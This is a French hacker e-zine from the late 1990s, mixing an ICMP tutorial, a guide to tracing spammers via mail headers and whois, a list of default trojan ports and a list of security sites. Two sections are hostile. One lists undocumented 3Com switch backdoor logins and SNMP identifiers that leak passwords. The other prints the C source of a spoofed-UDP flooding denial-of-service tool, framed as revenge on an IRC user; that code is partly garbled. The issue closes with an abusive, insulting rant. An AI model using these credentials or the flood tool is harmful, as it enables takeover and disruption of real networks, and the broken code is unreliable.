Pour finir r‚capitulons : ICMP est une composante obligatoire de IP qui permet d'envoyer des messages d'alerte et de diagnostic par le biais du module ICMP. Le module ICMP est impl‚ment‚ au sein du module IP. Les messages ICMP sont donc trŠs utiles pour la d‚tection de problŠmes r‚els ou potentiels sur un r‚seau. On peut g‚n‚rer des messages ICMP en r‚ponse … des conditions d'erreur trŠs vari‚es. Les messages ICMP servent ‚galement … diagnostiquer un r‚seau et … ‚tablir des statistiques concernant celui-ci. J'espŠre que vous en comprendrez grƒce … cette doc les autres utilisations que vous pouvez en faire.... #Brain Override# -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- III]QUELQUES TRUCS DE HACKERS POUR UN MONDE MEILLEUR !!! (ici, il ne sera trait‚ que de technique pouvant apporter des connaissances … la compr‚hension de tout ce qui touche a l'Internet, en aucun cas, il ne sera question de techniques dangereuses voir ill‚gales (NDRL: Bouhhhh!). Donc, pas la peine de me contacter pour ce genre d'info.). Un petite remarque en passant, je dis bien " … l'Internet " et non pas " … Internet ", l'Internet n'‚tant pas une marque (NDRL: Il fait toujours des siennes … ce sujet...). Le mot Hacker est souvent employ‚ a tord en voulant parler d'un pirate, la traduction du mot Hacker peut se traduire par le mot " bidouilleur " ou par tout autre mot d‚signant quelqu'un de curieux, qui recherche le pourquoi du comment, qui exp‚rimente diverses techniques. A ne pas confondre avec Pirates, qui est une personne qui s'introduit sur un systŠme informatique , a l'insu par exemple de l'administrateur de la machine (NDRL: C'est vrai ‡a,pauvre Admin;) , dans le but de modifier des pages web, de " pomper " de l'information, de les revendre, etc etc... C'est une pratique tout a fait condamnable, et d'ailleurs souvent condamn‚e. Divers articles suivront celui-ci. (NDRL : On espŠre) " COMMENT LUTER CONTRE LES SPAMMERS " Qu'est ce que c'est que ca un spam???? Le mot Spam a pour origine une marque de conserve de type corned beef au contenu difficilement identifiable mais trŠs populaire dans les pays Anglo-saxons. Ce mot est souvent assimil‚ … quelque chose d'omnipr‚sent (dans tous les magasins alimentaires), de d‚nu‚ de go–t, insipide, ou sans substance. Les Monty-Pythons l'on rendu encore plus populaire grace a l'un de leur sketch. D'autres, disent que SPAM vient de la contraction de " Send by Post A lot of Mail " sans commentaire ... Mais quelle imagination !!! (N'est ce pas Archangel t'as du fumer la moquette pour trouver ca !!!) Un spam est un message envoy‚ a plusieurs destinataires en mˆme temps, soit personnellement … une adresse email, soit dans un groupe de news. Ces messages ont toujours un rapport avec soit la religion (sectes), l'argent (comment gagner 10$ a la seconde) ou le sexe. Ces derniers temps, les spammers ont pris une trŠs grande importance, avec en plus une loi Francaise qui leur est favorable, ce qui peut entrainer une surcharge des serveurs mail, de serveurs de news, de la bande passante, et des temps de connexion. Combien parmi vous, pour un mail int‚ressant, ne se sont pas retrouv‚s avec 10 mails en mˆme temps vous vantant les m‚rites du produits DUCHMOL, ou bien comment gagner beaucoup d'argent dans une trŠs brŠve p‚riode de temps ??? La cible privil‚gi‚e des SPAMMERS sont les comptes email du genre geocities.com ou USA.net etc etc ... A cela 2 raisons: Les emails "tants gratuites, tous le monde prends une " boite " de ce genre au cas ou, ou bien pour rester " faussement " anonyme. Il ne reste plus qu'au spammer … r‚cup‚rer ces adresses trouv‚es dans les groupes de news, mailing list, site Web, pour se cr‚er une banque de donn‚es d'adresses email. En ce qui concerne Geocites.com ou USA.net, ces boites ‚tant gratuites, et ayant un trŠs gros trafic par jour, l'administration de ces boites est parfois totalement n‚glig‚e, pas de filtrages anti spam, ce qui n'est pas le cas chez la pluspart des fournisseurs d'accŠs internet. Un exemple concret, l'arrˆt provisoire mais total des serveurs Mail de USA.NET il y a maintenant 6 mois suite a l'utilisation de ces serveurs de mail comme relais pour des email de type publicitaires. Comment lutter contre les spammers??? C'est un peut comme jouer au chat et a la sourie. PremiŠrement, ne JAMAIS r‚pondre … un spammer. Souvent, le message vous est envoy‚ sans que l'exp‚diteur ne connaisse r‚ellement votre adresse email, et le fait de lui r‚pondre, lui permet de " valider " votre adresse email. Certains messages du genre " Si vous ne d‚sirez plus recevoir ces informations, renvoyez ce message avec la mention " unsubscribe ", peuvent etre un moyen d‚tourner de connaitre votre adresse email (NDRL : Les salauds !! Les salauds !!). D'une maniŠre g‚n‚rale, se m‚fier de tout message dont vous ne connaissez pas l'exp‚diteur. Ne jamais donner son adresse email r‚elle sans que cela ne soit r‚ellement n‚cessaire. Dans les groupes de News, indiquer une adresse du genre: " jean_duchmol@NOSPAMgeocities.com " suivis du message " Remove NOSPAM to respond ". LES MOYENS TECHNIQUES POUR RETROUVER UN EMAIL SPAMMER: (Le mail ci-dessous est pris totalement a titre d'exemple, les commandes utilis‚es sont des commandes sous Unix ou Linux, mais peuvent tout a fait etre adapt‚es sous Windows. [ Pour ceux qui l'utilise encore ;-)) ]. Supposons que vous ayez re‡u l'email ci-dessous, nous affichons a l'‚cran le mail en affichant aussi le " Header " ou " entete " du mail. (Pour ceux qui sont par exemple sous un lecteur de mail type Netscape, pour les autres, les pures et durs, la question ne se pause meme pas. ). ---------------------------------------------------------------- Received: from mail.gnn.com (70.los-angeles-3.ca.dial-access.att.net [165.238.38.70]) by mail-e2b-service.gnn.com (8.7.1/8.6.9) with SMTP id BAA14636; Sat, 17 Aug 1996 01:55:06 -0400 (EDT) Date: Sat, 17 Aug 1996 01:55:06 -0400 (EDT) Message-Id: <199608170555.BAA14636@mail-e2b-service.gnn.com> To: Subject: FREE HEAVEN. From: FREE@Heaven.com " FREE " House and lot in " HEAVEN " Reserve yours now, do it today, do not wait. It is FREE just for the asking. You receive a Personalized Deed and detailed Map to your home in HEAVEN. Send your name and address along with a one time minimum donation of $1.98 cash, check, or money order to help cover s/h cost TO: Saint Peter's Estates P.O. Box 9864 Bakersfield,CA 93389-9864 This is a gated community and it is " FREE ". Total satisfaction for 2 thousand years to date. >From the Gate Keeper. (PS. See you at the Pearly Gates) GOD will Bless you. ---------------------------------------------------------------- Nous pouvons nous douter a coup sur que l'en-tˆte de ce mail est faux. Le but du Spammer est de vous atteindre a coup sur, mais de se prot‚ger de son cot‚ de vos r‚ponses ou insultes. Nous utilisons, donc la commande " whois " illegal# whois heaven.com nous avons la r‚ponse: Time Warner Cable Broadband Applications (HEAVEN-DOM) 2210 W. Olive Avenue Burbank, CA 91506 Domain Name: HEAVEN.COM Administrative Contact, Technical Contact, Zone Contact, Billing Contact: Melo, Michael (MM428) michael@HEAVEN.COM (818) 295-6671 Record last updated on 02-Apr-96. Record created on 17-Jun-93. Domain servers in listed order: CHEX.HEAVEN.COM 206.17.180.2 NOC.CERF.NET 192.153.156.22 ---------------------------------------------------------------- suite a cela nous allons v‚rifier l'adresse d'exp‚dition: illegal# finger FREE@heaven.com nous avons la r‚ponse suivante: [heaven.com] finger: heaven.com: Connection timed out Plusieurs possibilit‚es suite a cette r‚ponse: soit l'administrateur du systŠme de heaven.com a d‚sactiv‚ le port " finger ", soit heaven.com n'est pas actif. Nous allons tester cette hypothese avec la commande " ping ". illegal# ping heaven.com la r‚ponse est: heaven is alive Cela veux dire que heaven.com est bien " actif " a ce moment donn‚. Nous testons cela par: illegal# telnet heaven.com nous devrions arriver a un ‚cran nous demandant un " login " et un " password ", a la place de cela nous avons par exemple: Trying 198.182.200.1 ... telnet: connect: Connection timed out Maintenant, nous savons que les gens ne peuvent pas se connecter a distance a heaven.com. Donc, nous pouvons en d‚duire que le spam n'a surement pas ‚t‚ envoy‚ de cette endroit. V‚rifions maintenant, chex.heaven.com est ce de l… que le Spam a ‚t‚ envoy‚? essayons: illegal# telnet chex.heaven.com 79 (79 port finger) Nous avons la r‚ponse: Trying 201.202.203.204 ... telnet: connect: Connection timed out donc, ni heaven.com ni chex.heaven.com n'ont pu etre utilis‚ par des personnes pour envoyer du mail. Donc ce sont 2 liens faux dans le " header " du mail. Essayons maintenant: illegal# whois gnn.com la r‚ponse est: America Online (GNN2-DOM) 8619 Westwood Center Drive Vienna, VA 22182 USA Domain Name: GNN.COM Administrative Contact: Colella, Richard (RC1504) colella@AOL.NET 703-453-4427 Technical Contact, Zone Contact: Runge, Michael (MR1268) runge@AOL.NET 703-453-4420 Billing Contact: Lyons, Marty (ML45) marty@AOL.COM 703-453-4411 Record last updated on 07-May-96. Record created on 22-Jun-93. Domain servers in listed order: DNS-01.GNN.COM 204.148.98.241 DNS-AOL.ANS.NET 198.83.210.28 Bingo, gnn.com est h‚berg‚ par America Online. AOL est un r‚seau informatique poss‚dant des passerelles vers l'Internet. Revenons donc a notre " entete " de mail spam. illegal# whois att.net La r‚ponse est: AT&T EasyLink Services (ATT2-DOM) 400 Interpace Pkwy Room B3C25 Parsippany, NJ 07054-1113 US Domain Name: ATT.NET Administrative Contact, Technical Contact, Zone Contact: DNS Technical Support (DTS-ORG) hostmaster@ATTMAIL.COM 314-519-5708 Billing Contact: Gardner, Pat (PG756) pegardner@ATTMAIL.COM 201-331-4453 Record last updated on 27-Jun-96. Record created on 13-Dec-93. Domain servers in listed order: ORCU.OR.BR.NP.ELS-GMS.ATT.NET199.191.129.139 WYCU.WY.BR.NP.ELS-GMS.ATT.NET199.191.128.43 OHCU.OH.MT.NP.ELS-GMS.ATT.NET199.191.144.75 MACU.MA.MT.NP.ELS-GMS.ATT.NET199.191.145.136 Bingo, encore un domain valide. Le coupable a donc pu envoyer son spam soit de heaven.com soit de gnn.com soit de att.net. Nous savons qu'il a peu de chance que cela soit de " heaven.com " puisque nous n'avons mˆme pas eu de r‚ponse du port login. Mais il reste encore: att.net et gnn.com qui sont fortement suspects. La derniŠre ‚tape est donc, d'envoyer une copie du spam re‡u avec sont header … la fois a postmaster@gnn.com et a runge@AOL.NET qui est list‚ par whois comme contact technique, ainsi que: postmaster@att.net ou bien hostmaster@ATTMAIL.COM (le contact technique). Avec un peux de chance, une de ces personne en lisant son courrier pourra utiliser le " ID number " du spam pour retrouver qui a falsifi‚ ce mail et la plupart du temps, r‚silier le compte internet du coupable. Restez toujours poli avec ces personnes, elles sont l… pour administrer le r‚seau et sont de votre cot‚. (la plupart du temps ;-)) Ne vous amusez pas … retrouver vous mˆme le Spamer pour le bombarder d'insultes, cela n'avance a rien, (NDRL : Si ‡a soulage comme dirait un certain Ing‚nieur conseil que je connais ;) et vous devenez vous meme le spamer. Si vous vous trompez de destinataire, lui ne vous ratera pas, et peux vous " pourrir " la vie. Personnellement, il y a plusieurs ann‚es, suite a une petite dispute, disons plut“t divergence de point de vue, je me suis retrouv‚ avec 40 mails par jours concernant la culture isoponique des laitues. Depuis, je suis incollable sur le sujet ;-))) TrŠs int‚ressant d'ailleurs. !!! Non sans dec !!! Ma seule parade a ‚t‚ de moi mˆme remonter le responsable de ce mail a la source, et de faire pareil. Ce n'est pas une solution croyez moi ... Respectez les autres et l'on vous respectera. Passez toujours par le responsable ou l'administrateur r‚seau, il est comme vous, il n'aime pas du tout h‚berger des gens pratiquant le spamming. PROCHAIN ARTICLE: La culture de la betterave sucriŠre sur les haut plateaux Tib‚tains. (Article qui sera r‚alis‚ par Bill Gates, suite a une reconversion forc‚e de son ‚quipe et de lui mˆme.) __________________\|/__________________ ----===ILLEGAL===---- /|\ "If Hacking is illegal, knowledge is illegal." ICQ N. 7812204 ill3gal@(NOSPAM)geocities.com http://www.geocities.com/SiliconValley/Lakes/6154/ ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ IV]Les failles made in 3COM SystŠmes affect‚s : Les systŠmes tournant sur les switches 3COM (CoreBuilder LAN et SuperStack II) Je tiens tout d'abord … remercier Eric Monti … qui nous devons la d‚couverte de cette faille dans le systŠme de s‚curit‚ des switches 3COM... Cette backdoor est en fait un niveau d'accŠs non document‚ par nos amis de chez 3com ;) Sans doute ont ils oubli‚s de l'inclure dans leurs docs par inadvertance, aussi j'aurai la bont‚ de le faire … leur place et gratuitement... Cette backdoor affecte les versions dites "intelligentes" et "‚tendues" des progs de switching pour les switches Lanplex/Corebuilder. En effet, en plus des classique account "admin", "read", et "write", il y a un autre account: LOGIN : debug PASS : synnet Cet account … certaines particularit‚s : Il possŠde non seulement tous les privilŠges du compte 'admin', mais ‚galement quelques commandes de debugging qui ne sont disponibles sous aucun autre compte. En effet, avec un simple 'telnet', en vous loggant en 'debug', vous pouvez changer tous les autres mots de passe, y compris celui du compte 'admin', sans pour autant poss‚der, l'ancien !!! Cela vous permet donc d'avoir un contr“le absolument complet sur le switche! Vous pouvez mˆme en bloquer l'accŠs … son propri‚taire... (qui … dit que les r‚seaux switch‚s ‚taient les plus s‚curis‚s ?). Cette technique a ‚t‚ v‚rifi‚e sur : Lanplex/CoreBuilder 2500s (SW versions 7.x et 8.x) CoreBuilder 3500 (Version 1.0.0.) 3Com LANplex 2500 (rev 7.15) avec la version 7.0.1-19. Il existe une backdoor similaire qui marche sur LinkSwitch 2700 et CELLplex 7000 : LOGIN : tech PASS : tech Bon un petit r‚sum‚ : CoreBuilder 6000/2500 -username: debug password: synnet CoreBuilder 7000 -username: tech password; tech SuperStack II Switch 2200 -username: debug password: synnet SuperStack II switch 2700 -username: tech password: tech Pendant qu'on y est, sachez ‚galement que vous pouvez trouver sur les SuperStack II switch 1000 (et 3000), l'account 'monitor', password 'monitor'. Pour tout vous dire sachez qu' … l'usine sont mis en place les account suivant : 'monitor', 'manager', et 'security' : Le pass ‚tant le nom du compte (manager;manager). Et il arrive fr‚quemment que les administeurs oublient de changer les 3... BONUS : 3com Netbuilders vous voulez r‚cup‚rer les clefs SNMP et les password admin ? pas de prob ;) enterprises.synernetics.lanplex.lanplexSystemsMib.1.19.0 = "password" enterprises.synernetics.lanplex.lanplexSystemsMib.6.7.0 = "public" #Brain Override# -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- V]Liste des ports par d‚faut utilis‚s par les trojans. Et bien je dirai en commentaire que ca peut toujours servir. port 21 - Blade Runner, Doly Trojan, Fore, FTP trojan, Invisible FTP, Larva, WebEx, WinCrash port 23 - Tiny Telnet Server port 25 - Antigen, Email Password Sender, Haebu Coceda, Kuang2, ProMail trojan, Shtrilitz, Stealth, Tapiras, Terminator, WinPC, WinSpy port 31 - Agent 31, Hackers Paradise, Masters Paradise port 41 - DeepThroat port 58 - DMSetup port 79 - Firehotcker port 80 - Executor port 110 - ProMail trojan port 121 - JammerKillah port 421 - TCP Wrappers port 456 - Hackers Paradise port 531 - Rasmin port 555 - Ini-Killer, Phase Zero, Stealth Spy port 666 - Attack FTP, Satanz Backdoor port 911 - Dark Shadow port 999 - DeepThroat port 1001 - Silencer, WebEx port 1011 - Doly Trojan port 1012 - Doly Trojan port 1024 - NetSpy port 1045 - Rasmin port 1090 - Xtreme port 1170 - Psyber Stream Server, Voice port 1234 - Ultors Trojan port 1243 - BackDoor-G, SubSeven port 1245 - VooDoo Doll port 1349 (UDP) - BO DLL port 1492 - FTP99CMP port 1600 - Shivka-Burka port 1807 - SpySender port 1981 - Shockrave port 1999 - BackDoor port 2001 - Trojan Cow port 2023 - Ripper port 2115 - Bugs port 2140 - Deep Throat, The Invasor port 2565 - Striker port 2583 - WinCrash port 2801 - Phineas Phucker port 3024 - WinCrash port 3129 - Masters Paradise port 3150 - Deep Throat, The Invasor port 3700 - Portal of Doom port 4092 - WinCrash port 4567 - File Nail port 4590 - ICQTrojan port 5000 - Bubbel, Back Door Setup, Sockets de Troie port 5001 - Back Door Setup, Sockets de Troie port 5321 - Firehotcker port 5400 - Blade Runner port 5401 - Blade Runner port 5402 - Blade Runner port 5555 - ServeMe port 5556 - BO Facil port 5557 - BO Facil port 5569 - Robo-Hack port 5742 - WinCrash port 6400 - The Thing port 6670 - DeepThroat port 6771 - DeepThroat port 6776 - BackDoor-G, SubSeven port 6939 - Indoctrination port 6969 - GateCrasher, Priority port 7000 - Remote Grab port 7300 - NetMonitor port 7301 - NetMonitor port 7306 - NetMonitor port 7307 - NetMonitor port 7308 - NetMonitor port 7789 - Back Door Setup, ICKiller port 9872 - Portal of Doom port 9873 - Portal of Doom port 9874 - Portal of Doom port 9875 - Portal of Doom port 9989 - iNi-Killer port 10067 - Portal of Doom port 10167 - Portal of Doom port 10520 - Acid Shivers port 10607 - Coma port 11000 - Senna Spy port 11223 - Progenic trojan port 12223 - Hack'99 KeyLogger port 12345 - GabanBus, NetBus, Pie Bill Gates, X-bill port 12346 - GabanBus, NetBus, X-bill port 12361 - Whack-a-mole port 12362 - Whack-a-mole port 12631 - WhackJob port 13000 - Senna Spy port 16969 - Priority port 20001 - Millennium port 20034 - NetBus 2 Pro port 21544 - GirlFriend port 22222 - Prosiak port 23456 - Evil FTP, Ugly FTP port 26274 (UDP) - Delta Source port 29891 (UDP) - The Unexplained port 30029 - AOL Trojan port 30100 - NetSphere port 30101 - NetSphere port 30102 - NetSphere port 30303 - Sockets de Troie port 31337 - Baron Night, BO client, BO2, Bo Facil port 31337 (UDP) - BackFire, Back Orifice, DeepBO port 31338 - NetSpy DK port 31338 (UDP) - Back Orifice, DeepBO port 31339 - NetSpy DK port 31666 - BOWhack port 33333 - Prosiak port 34324 - BigGluck, TN port 40412 - The Spy port 40421 - Agent 40421, Masters Paradise port 40422 - Masters Paradise port 40423 - Masters Paradise port 40426 - Masters Paradise port 47262 (UDP) - Delta Source port 50505 - Sockets de Troie port 50766 - Fore port 53001 - Remote Windows Shutdown port 54321 - School Bus port 60000 - Deep Throat port 61466 - Telecommando port 65000 - Devil #Brain.Override# -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- VI] Liste de quelques sites interessants. Et oui, une simple liste.. N'empˆche que ce ne sont pas forcemment les plus connus les meilleurs. Alors bon surf ;) http://www.sendmail.org http://www.cypango.net/~spam/ http://www.tis.com http://www.cert.org http://iris.acs.neu.edu/~goedicke/security.html http://www.wolfenet.com/~jhardin/ipwadm.html http://www.users.interport.net/~reptile/linux/index.html http://www.ecst.csuchico.edu/~jtmurphy/ http://www.erols.com/avenger/ http://www.rootshell.com/ http://www.dna.lth.se/~erics/linux.html http://www.sophist.demon.co.uk/ping/index.html http://www.cs.iastate.edu/~ghelmer/unixsecurity/unix_vuln.html http://www.geek-girl.com/bugtraq/ http://www.greatcircle.com/pkt_filtering.html http://www.tiac.net/users/steveg/security.html -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- VII] Conseal Pc firewall... Il est 2H00 du mat, les yeux ‚clat‚s vous essayer de comprendre ce que vous avez cod‚ vous mˆme pendant 3 jours sans dormir... Vous n'en pouvez plus, vous d‚cidez de vous d‚tendre un moment avec vos potes sur IRC. Connection ‚tablie.. Je me tape la causette avec mon pote Snowcrash. Soudain, une fenˆtre s'ouvre: Et mec, je suis ARCHANGEL le meilleur des hackers !! Je te d‚fie en COMBAT singulier, Je suis un R3AL H4ck3R moi ! Je ferme la fenˆtre et je continue ma causette.. Quelques secondes plus tard : t'as pas compris ou quoi ? Tu t'‚crases, t'es qu'une merde !! _ OFF !! T'fa‡ons j'ai mis mes protection je suis invincible avec mon super firewall.. Mˆme que j' ai fais sauter la protection de la limitation dans le temps. T'es mort mon gars !!! C'est bien t'as trouv‚ le crack de conseal sur Astalavista, maintenant ‚crase, Je cause et je te trouve nuisible ok ? Vas sur #L4m3rZ et fais pas chier. Eh ?? T'as essay‚ de pirater mon ordi ?? Je vais te winnuker t'es mort, dans quelques secondes tu es d‚connect‚.. Dommage pour lui, mais sur mon firewall linux, le port 139 n'est pas ouvert... Bon il est temps de r‚gler son compte … ce blaireau.. Je lance ce programme g‚nial qu'est TuneEmul et je lance une session telnet sur un de mes serveurs linux. Ensuite je compile ce petit programme. #include #include #include #include #include #include #include #include #include #include #include #ifdef BROKEN_LIBC #include #else #define u_char unsigned char #define u_short unsigned short #endif strict sockaddr sa; int main(int argc,char **argv) { int fd; int x=1; int hosti=192; int hostii=168; int hostiii=1; int meep=0; int fooport=1; int numpack=0; char funhost[15]; struct sockaddr_in *p; struct hostent *he; u_char gram[36]= { 0x45, 0x00, 0x00, 0x26, 0x12, 0x34, 0x00, 0x00, 0xff, 0x11, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0x00, 0x12, 0x00, 0x00, '3','1','3','3','7','8','9','0' }; if(argc!=3) { fprintf(stderr,"Saihyousen, by Noc-Waggge\n"); fprintf(stderr,"The faster your connection to the internet is (latency wise, not bandwith)\n"; fprint(stderr,"and the lower the CPU speed of the victim will\nincrease probability of success\n"; fprintf(stderr,"usage: %s victim num_of_packets Ex: saihyousen 127.0.0.1 40000\n",*argv); exit(1); }; if((fd=socket (AF_INET,SOCK_RAW,IPPROTO_RAW))==-1) { perror("requires RAW SOCKETS"); exit(1); }; #ifdef IP_HDRINCL if (setsockopt(fd,IPPROTO_IP,IP_HDRINCL,(char*)&x,sizeof(x))<0) { perror("setsockopt IP_HDRINCL"); exit(1); }; #else fprintf(stderrn,"we don't have IP_HDRINCL :-(\n\n"); #endif /* The stuff below is so that it's not fully sequencial i.e 100.100.100.101, 100.100.100.102 */ for (numpack=0;numpack<=atoi(argv[2];numpack++) { if (meep=0) { ++hosti; meep++;} if (hosti>254) hosti=1; if (meep==1) { ++hostii; meep++;} if (hostii>254) hostii=1; if (meep==2) { ++hostiii; meep=0;} if (hostiii>254) hostiii=1; sprintf( funhost, "%i.%i.%i.%i",hosti,hostii,hostiii,hosti); (he=gethostbyname(funhost)); bcopy(*(he->h_addr_list),(gram+12),4); if((he=gethostbyname(argv[1]))==NULL) { fprintf(stderr,"can't resolve destination hostname\n"); exit(1); }; bcopy(*(he->h_addr_list),(gram+16),4); fooport++; /* resets the port to 1 if it's nearing the end of possible values */ if (fooport>65530) (fooport=1;); *(u_short*)(gram+20)=htons((u_short)fooport); *(u_short*)(gram+22)=htons((u_short)fooport); p=(struct sockaddr_in*)&sa; p->sin_family=AF_INET; bcopy(*(he->h_addr_list),&(p->sin_addr),siezof(struct in_addr)); if((sendto(fd,&gram,sizeof(gram),0,(struct sockaddr*)p,sizeof(struct sockaddr)))== -1) { perror("sendto"); exit(1); }; /*printf("Packet # %i\n", numpack); */ /* Turn that on to see where you are.. it'll slow the attack though */ }; printf("Attack against %s finished", argv[1]); putchar('\n'); return 1; } N'oublions pas de remercier Max Schau qui est l'auteur de cet exploit. Petit message avant le lancement du programme : C'est l'heure d'aller se coucher pour les lamers.. HEIN ?? La chance accorde ses faveurs aux esprits avertis. #Brain.Override# ------------------------------------------------------------------------------------------ ------------------------------------------------------------------------------------------ VIII] ZIPIZ Vous avez surement vu r‚cemment le dernier site qui tord le cou … l'underground ! : zipiz.com. Bon bref r‚sum‚ : ce site est en gros une parodie du site zataz.com, o— tout ce qui touche … l'underground est tourn‚ … la d‚rision. Bon avouons quelque chose, du point de vu technique, le site a ‚t‚ extrŠmement bien r‚alis‚ : c'est du travail d'artiste. Mais quand au contenu... Exemple : Morceaux choisis : "Ce mois-ci, un de mes pr‚f‚r‚s : Brain Override, 23 ans. Activit‚s principales : auteur-compositeur au bontempi … p‚dale, science-fiction, magie noire et courses chez Auchan Aubagne. Bref, le prototype du Jean-Kevin. Mon modŠle. Il publie l'un des zines underground les plus d‚biles disponibles sur le march‚ : "le Cyber Hacker's Guide". Un seul num‚ro pour l'instant !" Primo : je n'ai jamais cach‚ mon age.. (ni mon nom d'ailleurs...) Secundo : Il me serait difficile d'aller faire mes courses … Aubagne, vu que j'habite aux cara‹bes et je ne m'en cache pas … Saint Barths. Cependant il se trouve que je rentre en France, alors promis zipiz j'habiterai pas trop loin de Auchan Aubagne, comme ‡… tu auras moins l'air d'un blaireau. Tertio : Je ne suis pas auteur-compositeur, mais auteur interprŠte. Quattro : il est vrai que j'aime assez la science-fiction mais quand … la magie noire, heu... oui mais dans les jeux de r“les... Pour finir, je ne suis pas boutonneux et les seules lunettes que je porte sont des lunettes de soleil. Bon ‡… c'‚tait un peu le coup de gueule perso mais attaquons nous au reste... Voyons un peu le niveau de ce monsieur qui a l'air de si bien nous connaŒtre : "C'est s–r que comme les hackers n'ont strictement aucune information int‚ressante … partager avec qui que ce soit, ils ont tout … gagner dans ce partage. N‚anmoins, le piratage de la NASA n'ayant d'autres int‚rˆts que de d‚nicher les horaires de la navette spatiale et le pirate ayant peu de chance de se retrouver un jour en position de postuler … un emploi d'h“tesse de l'espace, on se demande … quoi pourrait bien lui servir cette information. Mais bon : Free ze information..." Bon d‚j… on peut voir le quotient intellectuel du gars... Ok cela ne vole pas haut, mais regardons de plus prŠs : En fait cet individu cherche … tourner … la d‚rision l'underground car il ne dispose en fait d'aucun argument r‚el … nous opposer.. Alors la seule chose qu'il sait faire c'est rire. Je cite : "Il publie l'un des zines underground les plus d‚biles disponibles sur le march‚ : "le Cyber Hacker's Guide". Notre sous-homme pr‚f‚r‚ l'a t'il seulement lu ? O— sont les critiques constructives ? Bon le mˆme : "Mais foin de subtilit‚s linguistiques. Pour simplifier, sur ce site, le hacker, le cracker, le pirate et le trou du cul d‚signe la mˆme personne : un casse-couilles qui bave de contentement … l'id‚e d'entrer dans des endroits o— personne ne l'a invit‚. Point." Tout d'abord sachez que des gens comme Stallman se considŠrent eux-mˆme comme des hackers. Un tel manque de respect est totalement injustifiable, de la part de quelqu'un qui pourtant se sert d'un ordinateur, et surtout... d'internet. Car sans ces gens qu'il appelle des casse-couilles ou des trous du cul, il ne pourrait avoir un site internet... Mais bon chez ce genre de d‚bile,on ne cherche pas trop … comprendre. A noter ‚galemement que ce monsieur ‚crivait dans son site que j'‚tais parano en citant non pas moi mais michel bouissou qui avait un problŠme avec ses clefs PGP. Vous voyez donc le genre.. D‚bile et mythomane. Allez encore une : "j'ai quand mˆme du mal … comprendre en quoi un quarteron de retard‚s boutonneux postant des pages constell‚es de tˆtes de mort en flamme sur multimania peut ˆtre porteur d'un id‚al communautaire." Vu la fixation de ce personnage sur les boutons, il a du avoir une adolescence difficile... Peut ˆtre des problŠmes plus intimes... Mais bon, aprŠs tout les problŠmes sexuels ou hormonaux de ce monsieurne nous regarde absolument pas. Heureusement pour lui le viagra et les poup‚es gonflables devraient arranger c… !!! "Toutes les utopies n'ayant pu trouver … s'exp‚rimenter ou ayant ‚chou‚ dans le monde r‚el cherchent … couvrir le net de qualit‚s topologiques ou sociales (le village plan‚taire) qu'il n'a pas et essaient de le remplir d'une population virtuelle qui n'existe pas. Un cyber trou du cul est encore et d'abord un vrai trou du cul. C'est vrai qu'il est plus simple de taguer 3 pages en HTML que de r‚investir l'Œle de la tortue pour y festoyer et plus si affinit‚s. Mais bon c'est quand mˆme pas le mˆme trip" Sans commentaires... "Le m‚tier de "profiler" de pirates est d'une telle facilit‚ qu'il ferait passer un emploi fictif de la mairie de Paris pour une corv‚e de chiotte dans un r‚giment de diarrh‚iques.." De pire en pire... "L'arme n‚cessaire et suffisante pour la chasse aux pirates ‡a n'est pas le calibre 12 mais DejaNews. Ce site permet de faire des recherches dans tous les newsgroups de la terre et de sa p‚riph‚rie. Tapez le pseudo d‚bile du hacker … identifier et vous connaŒtrez en 3 secondes sa vie intime : ses pr‚occupations, ses angoisses, sa marque de c‚r‚ales pr‚f‚r‚e et, les bons jours, son num‚ro de s‚curit‚ sociale. Dans le pire des cas, relancez la recherche sur ses centres d'int‚rˆts sp‚cifiques (Goldorak, les blondes au gros seins, les centrales nucl‚aires peintes en bleu etc...) et vous d‚couvrirez ses autres pseudonymes et finalement, au d‚tour d'un post anodin sur fr.misc.handicap apparaŒtra : jean-kevin.leboulet@groslamer.com" Pour l'instant la seule chose que j'ai pu constater c'est que ce cher zipiz ne sait pas s'en servir (il faut vraiment ˆtre con !) voir : erreur michel bouissou.. Bref ce gars ne sait mˆme pas se servir de Deja-New : LA TACHE PAR EXCELLENCE !! Ne pas savoir lire une entˆte,et en plus publier le r‚sultat sur le web, il faut ˆtre con !! "Ils se croient ind‚tectables en passant par 12 anonymizers … travers la planŠte mais ils ‚crivent leurs petites annonces, racontent leur d‚boire sentimental (le pluriel est superflu), r‚pondent … la plus petite provocation en d‚ballant les moindres d‚tails de leur pauvre vie sans asp‚rit‚ : "j'ai pass‚ trois mois en emploi d'jeun au Mac D... du boulevard Mac D.. du 8 au 12 f‚vrier 1999, donc je sais de quoi je parle !". "je cherche un appartement prŠs de mon boulot …...", "ma copine est cor‚enne et son chien moldave", "je vends ma t‚l‚, mon micro-onde, un canap‚-lit et une red hat pas d‚ball‚e", "je cherche du boulot en Cor‚e" (bon d‚barras), "j'ai vu le mˆme portable au Auchan … Aubagne", "qui connaŒt un m‚dicament efficace contre l'acn‚ juv‚nile", "cherche un fianc‚ pour mon hamster P‚pette, pas s‚rieux s'abstenir" etc..." Pour commencer, quelqu'un qui a des comp‚tences de hacker, ne travaille pas dans un "mac do" et n'est pas en emploi jeune !! Pour ce qui est du portable … auchan aubagne (vu que cette phrase est de moi), je resignale … ce monsieur que je vis aux Cara‹bes (mais ‚videmment j'ai des amis en m‚tropole...) Zipiz a peut ˆtre fait ce site pour r‚ussir … d‚nicher quelqu'un de plus con que lui... Qu'il se rassure, il est bien le seul … ˆtre aussi bˆte. "Limite, ‡a peut devenir amusant pour celui que ‡a amuse. A la fin de ce voyage au bout de la bˆtise, vous en reviendrez avec l'‚ternelle constatation : "Mais comment peut-on ˆtre aussi con ?" Sacr‚ zipiz tu en sais quelque chose !!! Voir : Notre bonhomme fait sur son site la pub d'une boite qui teste la s‚curit‚ de votre PC.. Allez y si vous voulez vous marrez. Mˆme pas spoof‚, et sous Windaube, ces champions de la s‚curit‚ informatique ne renvoient mˆme pas la bonne IP et r‚pondent attention faible vuln‚rabilit‚ car le port telnet est ouvert... On peut voir que les gens que recommande zipiz sont … la hauteur de son quotient intellectuel. Pour clore cet article, je dirai qu'il est dommage de voir ainsi du talent gach‚, mais … ce niveau l… je pense que c'est irr‚cup‚rable : Les boeufs resteront des boeufs !!! #Brain.Override# 